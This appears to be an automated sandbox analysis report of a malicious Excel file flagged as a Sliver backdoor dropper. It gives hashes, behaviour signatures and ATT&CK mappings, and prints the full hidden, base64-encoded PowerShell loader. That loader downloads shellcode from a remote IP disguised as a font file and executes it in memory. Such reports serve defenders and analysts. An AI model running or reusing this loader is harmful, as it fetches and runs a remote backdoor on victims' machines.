sliver | 4ae151e76c7d2da0d855f92abf58bd44c00a18eaadb7550f46507aae9c07caad

General

Target

4ae151e76c7d2da0d855f92abf58bd44c00a18eaadb7550f46507aae9c07caad.xls
Size

46KB
MD5

5f292d4cf9f505eca69bf6ce3905319a
SHA1

5b77b73b29c78a54066a4d059ddb1ddd416d7b93
SHA256

4ae151e76c7d2da0d855f92abf58bd44c00a18eaadb7550f46507aae9c07caad
SHA512

ac71e214369caf1cb43cf0fabfe4268321985f69024a622721f5e359908c9d0ede008f1d0d9d9053689a2d94dd0bd504b9678ca5afab10591c9c506c08b3caa8
SSDEEP

768:w4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:7SFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score

10^/10

sliver backdoor discovery execution trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2844	3056	powershell.exe	EXCEL.EXE

Sliver RAT v2 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2844-46-0x00000000064F0000-0x0000000006F6E000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

4 2844 powershell.exe
6 2844 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2844 powershell.exe

flow	pid	process
4	2844	powershell.exe
6	2844	powershell.exe

pid	process
2844	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

EXCEL.EXEpowershell.execsc.execvtres.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

3056 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2844 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2844 powershell.exe
Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

EXCEL.EXE

pid process

3056 EXCEL.EXE
3056 EXCEL.EXE
3056 EXCEL.EXE
3056 EXCEL.EXE
3056 EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

pid	process
3056	EXCEL.EXE

pid	process
2844	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2844	powershell.exe

pid	process
3056	EXCEL.EXE
3056	EXCEL.EXE
3056	EXCEL.EXE
3056	EXCEL.EXE
3056	EXCEL.EXE

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

EXCEL.EXEpowershell.execsc.exe

description	pid	process	target process
PID 3056 wrote to memory of 2844	3056	EXCEL.EXE	powershell.exe
PID 3056 wrote to memory of 2844	3056	EXCEL.EXE	powershell.exe
PID 3056 wrote to memory of 2844	3056	EXCEL.EXE	powershell.exe
PID 3056 wrote to memory of 2844	3056	EXCEL.EXE	powershell.exe
PID 2844 wrote to memory of 2776	2844	powershell.exe	csc.exe
PID 2844 wrote to memory of 2776	2844	powershell.exe	csc.exe
PID 2844 wrote to memory of 2776	2844	powershell.exe	csc.exe
PID 2844 wrote to memory of 2776	2844	powershell.exe	csc.exe
PID 2776 wrote to memory of 2668	2776	csc.exe	cvtres.exe
PID 2776 wrote to memory of 2668	2776	csc.exe	cvtres.exe
PID 2776 wrote to memory of 2668	2776	csc.exe	cvtres.exe
PID 2776 wrote to memory of 2668	2776	csc.exe	cvtres.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\4ae151e76c7d2da0d855f92abf58bd44c00a18eaadb7550f46507aae9c07caad.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3056
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2844
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lkptt1_a.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2776
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3515.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3514.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2668

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cab45C9.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES3515.tmp

Filesize
1KB

MD5
3e14f8d0cc219adec19095c5dbf10fa0

SHA1
66f36f1c13ef8069cbed538cbc6c0a6c692fd88a

SHA256
288d50a9f7cbbb5b55c3e41ab09790940c378a6c625b49950b86cff84f28db97

SHA512
04f540e113fb11fc6604f1d911f0734ac3658d0708b6944b197c3b8c857d72b57184ae649349f710132a0e4e7cc6b19f57febf760999861414a59c2f13177212

Download Submit
C:\Users\Admin\AppData\Local\Temp\lkptt1_a.dll

Filesize
3KB

MD5
6a2b9ee753f43b2cf22c5cd4e9a2a717

SHA1
92cfb042e8142ead033bfc3df277977bbd3dff2d

SHA256
dda28eff952daff75fe8f45f0c8cfff0d590ee2dc38fd283f131d94a839e0595

SHA512
89c46ad404f2543b67619a248fa4711dc592a22b785ab2bcc64d6e8ceecfe61bef8aa2d8f72783d3016323ac46190b4e9268d12cb21a1a20f50700fe96c7aec2

Download Submit
C:\Users\Admin\AppData\Local\Temp\lkptt1_a.pdb

Filesize
7KB

MD5
3e846b8b85ea2442dceedbefa302fbd6

SHA1
019c9392921d96f37f9f641bb5cefdd3c9dd063a

SHA256
eaaae2bdbb6d586979cad6ee47f8d56a208ce38106e1c41e154bea9650e7eb67

SHA512
dcbae7d0d36bb384f6f50c238434d46716e02166e674ca057a182d020c421eefb23b6018aa684954b6e8a789176706b7b0d436b4c4feb042cce58e5a29953b7c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC3514.tmp

Filesize
652B

MD5
95751c4a5fa3a787f8a3481a60aba463

SHA1
3de513bd364f0468218ef0cee93fec5f7d122dc5

SHA256
3e2874b4a298ec786e9cba3dc0f2894d33b67f6acecee562670477514fc35353

SHA512
537c2dd595d1a1c7137753f1e22416253adc31277a9279f069362dadef0851a2ef90e5c922dd5bb678ecafa5c12bd5f42221596393102cd82b08d5ebafeb6f1c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lkptt1_a.0.cs

Filesize
631B

MD5
f4dd5c682eb7b3b679f084261bfc7c4c

SHA1
70f75d7a4e42c185eb09139ed3c6f7338a2219c2

SHA256
2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

SHA512
8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lkptt1_a.cmdline

Filesize
309B

MD5
2453b0de4b918ebf80d050631f92efad

SHA1
3d6c3cfe3ecc10e9a7b6463366c3865d4ff2e38d

SHA256
2624fff61cc6c4996ab8fc7960b9140b2a8083715e783eba9a1381245ab2598c

SHA512
7944a053abeca6027ede10b3b050a11d8ba38e2b630d864ac313b629447177b5615c935592f6244847cd05086faf406defbaa50155925c818e64d0b31c616074

Download Submit
memory/2844-46-0x00000000064F0000-0x0000000006F6E000-memory.dmp

Filesize
10.5MB

Download
memory/3056-1-0x00000000729CD000-0x00000000729D8000-memory.dmp

Filesize
44KB

Download
memory/3056-9-0x0000000006730000-0x0000000006830000-memory.dmp

Filesize
1024KB

Download
memory/3056-8-0x0000000006730000-0x0000000006830000-memory.dmp

Filesize
1024KB

Download
memory/3056-27-0x00000000729CD000-0x00000000729D8000-memory.dmp

Filesize
44KB

Download
memory/3056-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/3056-44-0x0000000006730000-0x0000000006830000-memory.dmp

Filesize
1024KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads